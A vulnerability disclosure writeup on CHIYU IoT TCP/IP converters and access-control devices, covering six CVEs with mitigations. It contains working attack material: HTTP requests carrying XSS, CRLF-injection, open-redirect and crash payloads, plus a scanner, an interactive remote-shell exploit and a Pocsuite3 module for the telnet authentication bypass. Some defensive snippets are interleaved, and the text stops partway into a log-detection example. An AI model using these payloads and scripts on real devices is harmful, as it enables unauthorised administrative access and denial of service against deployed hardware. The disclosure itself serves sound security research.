CHIYU IoT devices
Vulnerabilities found on IoT devices from CHIYU.

CVE-2021-31249

Title: CRLF injection in CHIYU BF-430, BF-431, and BF-450M TCP/IP Converter devices
Vulnerability: CRLF injection
CVE ID: CVE-2021-31249
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc, due to a lack of validation of the redirect= parameter, which is accepted by multiple CGI components.
Affected parameter: redirect=
Component: all the CGI components
Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>
Payload
```
setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>
```
HTTP request
```http
GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```
HTTP response
```http
HTTP/1.1 302 Found
Location: setting.htm
<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html
```
See also: CHIYU TCP/IP Converter devices - CRLF injection (Exploit Database); nuclei-templates/CVE-2021-31249.yaml at master · projectdiscovery/nuclei-templates (GitHub)
Impact: The impact of CRLF injection varies; it includes all the impacts of Cross-Site Scripting, up to information disclosure.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31250

Title: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
Vulnerability: Stored XSS
CVE ID: CVE-2021-31250
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Multiple stored XSS vulnerabilities were discovered on BF-430, BF-431 and BF-450M TCP/IP Converter devices from CHIYU Technology Inc, due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi and ppp.cgi.
To exploit this vulnerability, an attacker can inject a specially crafted XSS payload through several CGI components to obtain sensitive information from the end user, such as session cookies, or redirect them to a malicious web page.

Proof-of-Concept: 01

Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>
HTTP request:
```http
GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```
HTTP response:

Proof-of-Concept: 02

Affected parameter: TF_hostname=
Component: dhcpc.cgi
Payload: /"><img src="#">
HTTP request and response:
```http
GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```

Proof-of-Concept: 03

Affected parameter: TF_servicename=
Component: ppp.cgi
Payload: "><script>alert(123)</script>
HTTP request:
```http
GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```
HTTP response

Proof-of-Concept: 04

Affected parameter: TF_port=
Component: man.cgi
Payload: /"><img src="#">
HTTP request:
```http
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```
HTTP response:
See also: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) (Exploit Database); nuclei-templates/CVE-2021-31250.yaml at master · projectdiscovery/nuclei-templates (GitHub)
Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31251

Title: Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
Vulnerability: Authentication bypass
CVE ID: CVE-2021-31251
SSV-ID: SSV-99267
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Several IoT devices from CHIYU Technology are vulnerable to a flaw that permits bypassing the telnet authentication process, due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
The next image shows the normal workflow with the authentication banner (left side) and the exploited scenario with the configuration menu (right side). In detail, when the telnet server tries to negotiate the telnet options with the client, the negotiation fails at the fourth TCP request, and the IoT device jumps to the next state, believing that the user has already authenticated.
To verify whether this condition is also present on other devices, a PoC was created; the results can be observed below. On the left side, many vulnerable devices were found with the checker; on the right side, the vulnerability is confirmed using the exploit.
Checker in action with multi-thread and CIDR - Pocsuite3:
Exploit in action - Pocsuite3:
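The negotiation bytes in the narrative and in the checker below are easier to review in a session capture once decoded. This is an added example, not code from the original post: a decoder for telnet option negotiation (command and option names from RFC 854/856/857/858/1091/1073) and a classifier that flags a server stream reaching the 'CMD>' prompt (the string the exploit strips from device responses) without first showing a username banner; the 'sername' banner check is the one the checker uses, and the sample streams are constructed.

```python
from typing import Dict, List, Tuple

IAC, DONT, DO, WONT, WILL, SB, SE = 0xFF, 0xFE, 0xFD, 0xFC, 0xFB, 0xFA, 0xF0
COMMANDS = {DONT: "DONT", DO: "DO", WONT: "WONT", WILL: "WILL"}
# Option names from RFC 856/857/858/1091/1073; anything else is shown numerically.
OPTIONS = {0x00: "BINARY", 0x01: "ECHO", 0x03: "SUPPRESS-GO-AHEAD",
           0x18: "TERMINAL-TYPE", 0x1F: "NAWS"}


def opt_name(code: int) -> str:
    return OPTIONS.get(code, "opt-%d" % code)


def decode_negotiation(data: bytes) -> Tuple[List[str], bytes]:
    """Split one direction of a telnet stream into decoded IAC negotiations and the
    remaining application bytes (banner text, prompt, user input)."""
    events: List[str] = []
    plain = bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            plain.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            events.append("truncated IAC")
            break
        cmd = data[i + 1]
        if cmd == IAC:                       # IAC IAC is an escaped 0xFF data byte
            plain.append(IAC)
            i += 2
        elif cmd in COMMANDS:                # IAC <WILL|WONT|DO|DONT> <option>
            if i + 2 >= len(data):
                events.append("truncated %s" % COMMANDS[cmd])
                break
            events.append("%s %s" % (COMMANDS[cmd], opt_name(data[i + 2])))
            i += 3
        elif cmd == SB:                      # IAC SB <option> ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end == -1 or i + 2 >= len(data):
                events.append("truncated SB")
                break
            events.append("SB %s" % opt_name(data[i + 2]))
            i = end + 2
        else:                                # NOP, GA, AYT, ... carry no option byte
            events.append("cmd-0x%02x" % cmd)
            i += 2
    return events, bytes(plain)


def session_summary(server_bytes: bytes) -> Dict[str, object]:
    """Summarise the server side of a captured telnet session: the options it
    negotiated, whether a login banner was shown, and whether the 'CMD>' shell prompt
    appeared before any login banner (the auth-bypass symptom described on the page).
    Assumption: the login banner contains 'sername', as the checker expects."""
    events, plain = decode_negotiation(server_bytes)
    text = plain.decode("ascii", "replace")
    login_at = text.find("sername")
    cmd_at = text.find("CMD>")
    return {
        "negotiated": events,
        "login_prompt_seen": login_at != -1,
        "shell_without_login": cmd_at != -1 and (login_at == -1 or cmd_at < login_at),
    }
```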
See also: https://www.seebug.org/vuldb/ssvid-99267 (www.seebug.org); CHIYU IoT Devices - 'Telnet' Authentication Bypass (Exploit Database)
Impact: Remote access to any affected device, bypassing the telnet authentication.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability. In this new version, the telnet service was disabled in order to solve this issue.
From vendor website:
Regarding CVE-2021-31251, it explains that the CHIYU serial converters & SEMAC door control panel have a security issue.
Because the telnet is able to connect with the device.
For this reason, CHIYU would like to include below the measures to fix the problem.
From now on, all of the shipments have the latest firmware.
The firmware will close telnet.
If you want to upgrade your converter's firmware, please contact CHIYU for upgrading.

Checker and Exploit

Checker
```python
#!/usr/bin/env python3
# Exploit Title:  (Checker) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

# usage : python3 checker.py -t IP
# usage1: python3 checker.py -f target.txt

import socket
import sys


def checker(HOST, PORT):
    socket.setdefaulttimeout(10)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connect = s.connect_ex((HOST, PORT))
        try:
            # Three rounds of the same option negotiation:
            # IAC WILL ECHO, IAC WILL SUPPRESS-GO-AHEAD, IAC DO TERMINAL-TYPE
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            result = s.recv(1024).strip()
            if result != b'\xff\xfe\x01':   # expected reply: IAC DONT ECHO
                s.send(b"\x09")
                result = s.recv(1024).strip()
            s.close()

            # A bare DONT ECHO reply with no username banner means the device
            # skipped the authentication state
            if connect == 0 and "sername" not in str(result):
                if b"\xff\xfe\x01" == result:
                    print("[+] " + HOST + " is vulnerable to CVE-2021-31251!")

        except KeyboardInterrupt:
            s.close()

        except EOFError:
            s.close()

    except socket.error:
        # was 'host', which is undefined in -t mode
        print("[-] " + HOST + " NOT vulnerable!")
    return 0


if len(sys.argv) < 3:
    print("Check the parameters before execution the checker.")
    exit(1)

opt = sys.argv[1]

if opt == "-t":
    HOST = sys.argv[2]
    PORT = 23
elif opt == "-f":
    PORT = 23
    with open(sys.argv[2]) as f:
        targets = [line.rstrip() for line in f]
else:
    print("Check the parameters before execution the checker.")
    exit(1)

if opt == "-t":
    checker(HOST, PORT)
else:
    for host in targets:
        if host:
            checker(host, PORT)
```
Exploit
```python
#!/usr/bin/env python3
# Exploit Title:  (Exploit) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

# usage: python3 exploit.py IP

import socket
import time
import sys

if len(sys.argv) < 2:
    print("usage: python3 exploit.py IP")
    exit(1)

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        # Same negotiation sequence as the checker
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()

        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                    cmd = input("(CHIYU pwnShell:) $ ")
                    body = cmd + "\n"
                    s.send(body.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode('utf8', 'ignore')

                    if not len(result):
                        print("[+] CHIYU device not available, try again ... (terminating)")
                        s.close()
                        break
                    print(result.strip('CMD>'))
                    b = "\n"
                    s.send(b.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode()
                    print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()

except socket.error:
    print("[+] Unable to connect to CHIYU device.")
```
PoCsuite
```python
import re
from collections import OrderedDict
import socket
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = 'CVE-2021-31251'
    version = '1'
    author = 'sirpedrotavares'
    vulDate = '2021-04-15'
    createDate = '2021-04-15'
    updateDate = '2021-04-15'
    references = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
    name = 'pwnCHIYU'
    appPowerLink = 'https://www.chiyu-tech.com'
    appName = 'CHIYU telnet'
    appVersion = 'Telnet service (all versions)'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELENT
    samples = []
    install_requires = []
    desc = '''
    An authentication bypass in telnet server from CHIYU Technology Inc devices allows obtaining a privileged
    connection with the target device by supplying a specially malformed request.
    '''
    pocDesc = '''
    Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
    telnet authentication process due to an overflow during the negotiation of the telnet protocol.
    Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may
    force the remote telnet server to believe that the user has already authenticated. Several models
    are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
    '''

    def _verify(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            # Same negotiation sequence as the stand-alone checker
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            s.close()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['rhost'] = self.url
                    return self.parse_attack(result)
                else:
                    result['VerifyInfo'] = {}
                    return self.parse_attack(None)
            else:
                return self.parse_attack(None)
        except socket.error:
            return self.parse_attack(None)

    def _attack(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    print("Connected! ;)\ntype: \"help\"\n\n")
                    while 1:
                        cmd = input("(CHIYU pwnShell:) $ ")
                        body = cmd + "\n"
                        s.send(body.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode('utf8', 'ignore')

                        if not len(result):
                            print("[+] CHIYU device not available, try again ... (terminating)")
                            s.close()
                            break
                        print(result.strip('CMD>'))
                        b = "\n"
                        s.send(b.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode()
                        print(result.strip('CMD>'))

        # KeyboardInterrupt/EOFError are listed before the generic handler so they
        # are actually reachable (EOFError is a subclass of Exception)
        except KeyboardInterrupt:
            output.success({})
        except EOFError:
            output.success({})
        except Exception as e:
            output.fail('target is not vulnerable:' + str(e))
        else:
            output.success({})

        return output

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


register_poc(DemoPOC)
```

CVE-2021-31252

Title: Open redirect vulnerability in CHIYU IoT devices
Vulnerability: Open Redirect
CVE ID: CVE-2021-31252
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
An open redirect vulnerability exists in BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, and SEMAC devices from CHIYU Technology. It can be exploited by sending the user a link with a specially crafted URL and convincing them to click on it.
To exploit this vulnerability, an attacker injects an arbitrary URL and convinces the end user to click on the link, which redirects them to a page with malicious content. All the CGI components are affected by this flaw.
Affected parameter: redirect=
Component: all the CGI components (if.cgi, man.cgi, etc.)
Payload: redirect=http://127.0.0.1/exploit.htm
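The validation the redirect= parameter lacks, as an added example that is not the firmware's code or the author's: it rejects the CRLF injection from CVE-2021-31249 (control characters that would end the Location header) and the open redirect of this section (any scheme, host or path component) and then requires a bare page name from an allowlist. ALLOWED_PAGES is an assumption built from the .htm names seen in the requests on this page.

```python
import re
from urllib.parse import unquote

# Constructed allowlist: page names that appear as redirect targets on this page.
# A real deployment would fill this from the firmware's actual page set.
ALLOWED_PAGES = frozenset({"setting.htm", "fail.htm", "AccLog.htm", "EmpRcd.htm"})

SCHEME = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")   # http:, https:, javascript:, ...


class RedirectRejected(ValueError):
    pass


def validate_redirect(raw_value: str) -> str:
    """Return a safe page name for redirect= or raise RedirectRejected.

    1. URL-decode, as the CGI layer does ("%0d%0a" becomes CR LF).
    2. Reject control characters: CR/LF would terminate the Location header and
       let the rest of the value become further headers or the response body.
    3. Reject anything that is not a bare file name: a scheme, a leading slash or
       backslash, or any path separator turns the 302 into an open redirect.
    4. Require the bare name to be on the allowlist.
    """
    value = unquote(raw_value)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise RedirectRejected("control character in redirect target")
    if SCHEME.match(value):
        raise RedirectRejected("absolute URL in redirect target")
    if "/" in value or "\\" in value:
        raise RedirectRejected("path or host component in redirect target")
    if value not in ALLOWED_PAGES:
        raise RedirectRejected("redirect target not on allowlist")
    return value


def location_header(raw_value: str) -> bytes:
    """Build the Location header a CGI handler should emit: the only CR LF in the
    output is the constant terminator added here, never bytes from the input."""
    page = validate_redirect(raw_value)
    return b"Location: " + page.encode("ascii") + b"\r\n"


def is_safe_redirect(raw_value: str) -> bool:
    try:
        validate_redirect(raw_value)
        return True
    except RedirectRejected:
        return False
```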
HTTP request
```http
GET /if.cgi?redirect=http://192.168.187.201/exploit.htm&failure=fail.htm&type=serial_apply&S_type=2&S_baud=3&S_userdefine=0&S_data=3&S_parity=0&S_stop=0&S_flowcontrol=0&S_timeout=0&S_length=0&S_delimiter1=00&S_deli_en1=0&S_delimiter2=00&S_deli_en2=0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/serial.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
```
HTTP response
Impact: The open redirect results from improper sanitization of input, which can be used to redirect users to external websites.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31641

Title: Unauthenticated XSS in several CHIYU IoT devices
Vulnerability: Reflected XSS
CVE ID: CVE-2021-31641
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC. The vulnerability was also observed on more recent firmware versions.
Component: any argument passed via URL that results in an HTTP 404
Payload: http://ip/<script>alert(123)</script>
HTTP request
HTTP response
See also: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) (Exploit Database)
Impact: This vulnerability is due to improper sanitization of input when the HTTP 404 page is presented, and it can be abused to redirect users to external websites.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31642

Title: Denial of Service in several CHIYU IoT devices affecting the web portal
Vulnerability: Integer overflow
CVE ID: CVE-2021-31642
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, BF-630, BF-631, and SEMAC. The vulnerability can be exploited by sending an unexpected integer (> 32 bits) in the page parameter, which crashes the web portal and makes it unavailable until the device is rebooted.
Affected parameter: page=
Component: if.cgi
Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP request
```http
GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
```
HTTP response
After the request, the web portal will be unavailable until a device reboot.
See also: CHIYU IoT Devices - Denial of Service (DoS) (Exploit Database)
Impact: Device crash and web portal unavailable.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

CVE-2021-31643

Title: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
Vulnerability: Stored XSS
CVE ID: CVE-2021-31643
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
A stored XSS flaw was discovered on SEMAC, Biosense, BF-630, BF-631, and Webpass IoT devices from CHIYU Technology Inc, due to a lack of sanitization of the input on the component if.cgi (username parameter).
To exploit this vulnerability, an attacker can inject a specially crafted XSS payload through the if.cgi component to obtain sensitive information from the end user, such as session cookies, or redirect them to a malicious web page.
Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>
HTTP request
HTTP response - SEMAC Web Ver7.2
```http
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1
```
HTTP response - BIOSENSE-III-COMBO(M1)(20000)
```http
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
```
See also: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) (Exploit Database)
Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
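For teams that cannot patch immediately, the web PoCs on this page translate into a few log-review rules. This is an added detection example, not code from the original post: it parses constructed Common Log Format lines whose request targets are taken from the PoCs above and flags CRLF in redirect= (CVE-2021-31249), an absolute URL in redirect= (CVE-2021-31252), HTML in any CGI parameter (CVE-2021-31250, CVE-2021-31643), HTML in a path that returned 404 (CVE-2021-31641) and an out-of-range page= on if.cgi (CVE-2021-31642). The log format, client addresses, timestamps, status codes and the MAX_LOG_PAGE threshold are assumptions.

```python
import re
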